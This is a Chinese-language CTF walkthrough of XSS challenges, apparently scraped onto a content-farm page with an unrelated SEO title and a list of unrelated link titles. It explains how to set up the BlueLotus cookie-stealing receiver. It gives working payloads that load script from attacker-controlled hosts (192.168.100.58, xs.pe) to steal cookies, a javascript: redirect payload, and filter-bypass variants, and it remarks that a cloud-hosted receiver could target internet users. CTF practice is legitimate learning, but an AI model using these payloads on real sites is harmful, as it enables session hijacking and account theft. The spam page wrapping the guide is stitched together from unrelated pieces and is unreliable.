当前位置: 首页 > news >正文

购物网站名字大全免费入驻的电商平台

购物网站名字大全,免费入驻的电商平台,wordpress怎么设置tdk,免费h5页面制作app一、搭建XSS平台 安装 1、我这里安装在本地的Phpstudy上,安装过程就是一路下一步(可以改安装路径),附上下载链接: # 官网:https://www.xp.cn/download.html# 蓝莲花 - github下载 https://github.com/fi…

一、搭建XSS平台

安装

1、我这里安装在本地的Phpstudy上,安装过程就是一路下一步(可以改安装路径),附上下载链接:

# 官网:https://www.xp.cn/download.html# 蓝莲花 - github下载
https://github.com/firesunCN/BlueLotus_XSSReceiver

phpstudy安装完成后启动服务

将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹

 然后在浏览器中输入:http://本机ip/BlueLotus_XSSReceiver-master   #  访问我们刚才拉到www文件夹下的BlueLotus_XSSReceiver文件,进入安装界面

2、配置XSS接收平台 - 蓝莲花

插入模板

填写接收数据的url ,格式:当前蓝莲花平台的url + 文件名(文件名自己取)

示例

最后选择生成paload

测试一下

3、将攻击语句复制保存下来,等下要用

<script src="http://127.0.0.1/BlueLotus_XSSReceiver-master/myjs/text.js"></script>

攻击演示

本地演示

突然想到一个问题,我刚才制作的攻击语句中的IP是本地的回环地址,所以如果我在虚拟机的靶场中测试攻击,那么我的蓝莲花平台是接收不到的,所以这里先在本地的靶场测试,等下在演示在虚拟机中的(如果蓝莲花平台部署在云服务器,就能攻击其他互联网用户)

解除输入框的字符限制

回到平台查看攻击

点击查看邮件信息 

虚拟机演示

ipconfig    # 查看本机ip

使用本机IP访问蓝莲花平台测试看看

重新构造攻击paload

<script src="http://192.168.100.58//BlueLotus_XSSReceiver-master/myjs/text.js"></script>

回到平台

二、反射型

(1)首先尝试用蓝莲花xss平台打cookie;但是不知道哪个步骤出现问题;老是获取不了cookie
示例:
payload:

image


获取响应:

image


结果:(就是没有cookie;不知道哪个环境出现问题)

image


(2)尝试了大佬的在线xss平台;成功了。自己重新搭建了一个另一个xss平台也成功拿到flag;需要在docker容器搭建,不演示了);但是蓝莲花的这个问题一直没有被解决;就是很垃圾!

在线xss平台:https://xssaq.com/(该平台主机上线有提示语音并且功能比蓝莲花和我搭建的另一个xss平台都好,所以就借助大佬搭建的xss平台作为本期演示平台)
成功拿到flag

image

三、存储型

(1)将payload上传到第一个输入框

image


此时主机上线不携带cookie

image


将url输入到第二个输入框;xss平台提示上线成功,此时携带cookie

image


还能看到当前的网页截屏

image

四、DOM反射

(1)首先插入<script>alert(1)</script>,发现攻击不成功,而返回的是;我们查看源码发现需要构造闭合

image


'></script><script>alert(1)</script>
发现成功了!

image


构造payload'></script><sCRiPt sRC=//xs.pe/cqW></sCrIpT>,获取flag

image

五、DOM跳转

(1)首先尝试,不成功;尝试构造js语句
http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800?jumpto=javascript:alert(1)
发现成功了,那么直接使用xss平台获取cookie
http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=javascript:$.getScript("//xs.pe/cqW")
拿到flag

六、过滤空格

(1)使用paylod发现空格被过滤了<sCRiPt sRC=//xs.pe/cqW></sCrIpT>
(2)直接使用/**/代替空格即可绕过

<sCRiPt/**/sRC=//xs.pe/cqW></sCrIpT> 

image


拿到flag

image

七、过滤关键词

(1)正交提交脚本测试发现将scr开头的单词全部替换为空

image


(2)尝试了双写;不行;那就尝试一下大小写吧;好像可以;直接注入payload拿到flag

image

http://www.yayakq.cn/news/455689/

相关文章:

  • 网站制作公司昆明个人 导航网站 备案
  • 做外贸站推广网站注册系统怎么做
  • 自己做的小网站上海建筑建材业网官网入口
  • 厦门网站建设格北仑建设局网站
  • 怎么建设收费网站最专业的营销网站建设公司
  • 上海网站建设心得有哪些网站做简历比较好
  • 网站开发需要数据库技术电商类网站咋做
  • 男女做的那些事情的网站做一网站要什么软件
  • 给网站添加关键词成都品牌logo设计
  • 一般网站建设中的推广费用个股期权网站开发
  • 营销网站建设实力派易网拓江东怎样优化seo
  • 网站建设法律可行性江西城乡建设培训中心网站
  • 合作社网站建设wordpress主题uifun
  • 做网站论文建设银行网站网页丢失
  • 做网站接私活价格怎么算文化推广网站建设心得
  • 做外贸c2c网站有哪些做公司网站建设价格低
  • 打开这个网站宜昌建设网站公司
  • 专业网页制作网站推广公司asp微信网站
  • 建网站哪家好案例楼市最新消息2022年房价走势
  • 用iis做的网站怎么更改端口景观设计说明
  • 内衣网站建设推广wordpress插件如何开发
  • asp.net 网站建设方案保健品网站建设方案书模板
  • 全flash网站下载免费注册网站流程
  • 厦门公司网站设计龙岩网站优化费用
  • 怎么做废品网站wordpress文档id初始化
  • 提供o2o网站建设seo搜索引擎优化平台
  • 电商企业门户网站建设方案英文网站建设怎么收费
  • 大二学生做网站难吗3d建模培训班有用吗
  • wordpress对接COS后网站变慢免费做企业推广的网站
  • 阿里云域名注册服务网站wordpress配置伪静态页面